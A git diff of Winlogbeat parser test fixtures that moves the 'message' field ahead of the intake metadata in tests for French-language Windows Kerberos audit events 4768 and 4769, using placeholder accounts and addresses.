index 53d650df2..c7ac196ea 100644
--- a/Beats/winlogbeat/tests/security_event_4768.json
+++ b/Beats/winlogbeat/tests/security_event_4768.json
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service 
:\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - 
"message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le 
r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}" + } }, "expected": { "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a 
\u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket 
:\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}", diff --git a/Beats/winlogbeat/tests/security_event_4769.json b/Beats/winlogbeat/tests/security_event_4769.json index 7b1f0f39d..ac4cdd94d 100644 --- a/Beats/winlogbeat/tests/security_event_4769.json +++ b/Beats/winlogbeat/tests/security_event_4769.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. 
L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. 
L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service 
:\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du 
client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de 
l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}" + } }, "expected": { "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. 
L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. 
L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}", diff --git a/Beats/winlogbeat/tests/security_event_4798.json b/Beats/winlogbeat/tests/security_event_4798.json index b69049f3d..3e7783fbd 100644 --- a/Beats/winlogbeat/tests/security_event_4798.json +++ b/Beats/winlogbeat/tests/security_event_4798.json 
